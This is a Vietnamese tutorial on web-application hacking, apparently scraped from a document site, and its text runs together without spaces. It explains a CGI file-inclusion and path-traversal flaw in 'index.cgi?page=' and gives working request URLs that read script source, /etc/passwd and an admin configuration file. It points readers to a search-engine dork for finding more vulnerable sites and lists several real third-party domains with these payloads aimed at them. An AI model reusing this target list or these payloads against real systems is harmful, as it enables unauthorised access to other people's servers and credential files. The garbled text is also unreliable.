Web Hacking

.WebHacking,BriefIntroduction: trangnàyđãđượcđọc lầnTrongthờiđạihiệnnaykhiinternetđượcphổbiếnrộngrãi,cáctổchức,cánhânđềucó
Nội dung trích xuất từ tài liệu:
Web Hacking.WebHacking,BriefIntroduction:trangnàyđãđượcđọc lầnTrongthờiđạihiệnnaykhiinternetđượcphổbiếnrộngrãi,cáctổchức,cánhânđềucónhucầugiớithiệuthôngtincủamìnhtrênxalộthôngtincũngnhưthựchiệncáccuộcgiaodịchbuônbánonline.Vấnđềnảysinhlàkhiphạmviứngdụngcủacácwebapplicationngàycàngphổbiếnthìkhảnăngxuấthiệnlỗivàbịtấncôngcàngcao.Trongcáclĩnhvựchacking,hackwebapplicationlàsânchơikhálýthúchonhữngaiyêuthíchcomputersecurity.Thôngthường,nhữngbướccơbảnkhithựchiệnhackwebbaogồmnhưsaucácbướcnàykhôngnhấtthiếtphảithựchiệntuầntựmàtùyvàođiềukiệncủachúngta.1.ThuthậpthôngtinởmứctrênvềhạtầngcủamụctiêuBướcnàytacầnthuthậpmộtsốthôngtinquantrọngnhưcóbaonhiêuserver,môhìnhcủacácwebserver,cácclientnàosẽtươngtácvớiứngdụngweb,kiểugiaotiếpthôngtin(transport)vàthôngquacáccổng(port)nào,nhữngsiteliênquanđếnviệcthựchiệnchứcnăngcủasitemụctiêu....2.KhảosátứngdụngwebỞđâytôichỉmôtảmộttrongnhữngphươngphápkhảosátkháphổbiếntừtrướcđếngiờ,đólàXemmãnguồnvàlợidụngcáclỗichophépxemmãnguồn.MộtsốngônngữwebthôngdụnghiệnnaycónhiềulỗinàynhưActiveServerPages(ASP),CommonGatewayInterface(CGI),ColdFusionServer(CFM),HypertextPreprocessor(PHP).Bàiviếtnàytôichỉđềcậpđến1bugđãcótừlâunhưngthấyvẫncònnhiềusitemắcphải,đólàlỗiliênquanđếnCGIdesignchophépviewsourcevàfilesystemtraversal.Hãyxemvídụsau:http://www.earthdayalliance.org/index.cgi?page=contact.htmỞđâyindex.cgiđượcgọivớithamsốtruyềnvàolàtrangcontact.htm(HTMLfile)nósẽđọcvàhiệnnộidungcủatrangnàylênclientbrowser.Tuynhiênnếungườiviếtcgikhôngkiểmtrakĩlưỡng,tacóthểlợidụngđểxemchínhnộidungcủafileindex.cgihaycáctrangkhác.Vídụsautasẽthaycontact.htmbằngindex.cgi:http://www.earthdayalliance.org/index.cgi?page=index.cgiỞđâytagặp1thôngbáolỗierror:Nosuchfileordirectory/web/guide/earthdayalliance/www/content/index.cgi,nguyênnhânlàthựctếindex.cgikhôngnằmtrongthưmụchiệnhành(tứclà../www/content/)mànằmởwww,dođótasẽchỉnhlạilink1chútbằng1dotdotslash,nhưsau:http://www.earthdayalliance.org/index.cgi?page=/../index.cgiChạylinknàytasẽthấynộidungcủaindex.cgiđượcshowtrênbrowser.Việcxemđượcsourcecóthểgiúptatìmhiểukĩcànghơnvềwebapp,thậmchínếumaymắncóthểxemđượcnhữngthôngtinquantrọngkhác.Lệnhsaulà1vídụdùnglỗinàyđểxemfileetc/passwdtrongunixserver:http://www.earthdayalliance.org/index.cgi?page=/../../../../../../../../../etc/passwdĐâychỉlà1vídụnhỏ,cònkhaitháchayhạnchếthếnàothìtùykhảnăngcủamỗingười.Cácbạncóthểtìmcácsitebịlỗinàybằngcáchdùngwww.google.com,searchtừkhóaliênquan,chẳnghạnnhư:index.cgi?page=Đâylàvàilinktôitìmthấy,cácbạncóthểthamkhảo:http://www.discountdata.com/index.cgi?page=index.cgihttp://home.no.net/danm2/freezeware/index.cgi?page=leecher.htmlhttp://home.no.net/danm2/freezeware/index.cgi?page=/../../../../../../../../etc/passwdhttp://itf.fys.kuleuven.ac.be/workshop2002/index.cgi?page=practical.htmhttp://itf.fys.kuleuven.ac.be/workshop2002/index.cgi?page=/../../../../../../etc/passwdhttp://www.resource.nl/uk/index.cgi?page=index.cgihttp://www.earthdayalliance.org/index.cgi?page=contact.htmhttp://www.earthdayalliance.org/index.cgi?page=/../index.cgihttp://www.earthdayalliance.org/index.cgi?page=/../../../../../../../../../etc/passwdhttp://www.nestingeagles.com/index.cgi?page=videoB.htmhttp://www.nestingeagles.com/index.cgi?page=/../index.cgihttp://www.nestingeagles.com/index.cgi?page=/../../../../../../etc/passwdhttp://www.warehousejewelry.com/cgibin/index.cgi?page=Privacy_Policy.htmhttp://www.warehousejewelry.com/cgibin/index.cgi?page=/../index.cgihttp://www.warehousejewelry.com/cgibin/index.cgi?page=/.././admin/configuration.plhttp://www.warehousejewelry.com/cgibin/index.cgi?page=/../../../../../../../etc/passwdhttp://demo1.secmod.com/index.cgi?page=links.htmlhttp://demo1.secmod.com/index.cgi?page=index.cgihttp://demo1.secmod.com/index.cgi?page=/../../../../../etc/passwdhttp://www.vintagejournal.com/VJ0901/index.cgi?page=/../index.cgihttp://www.vintagejournal.com/VJ0901/index.cgi?page=home.htmhttp://www.datadart.com/commercesql/index.cgi?page=STK%20Datasheets.html&carhttp://www.datadart.com/commercesql/index.cgi?page=/../index.cgihttp://www.gatlinburggateway.com/index.cgi?&page=/../../../../../../etc/passwdhttp://www.berkshireis.com/index.cgi?page=news.htmlhttp://www.berkshireis.com/index.cgi?page=index.cgihttp://www.berkshireis.com/index.cgi?page=/../../../../../etc/passwdhttp://www.smokymtnartscrafts.com/index.cgi?page= ...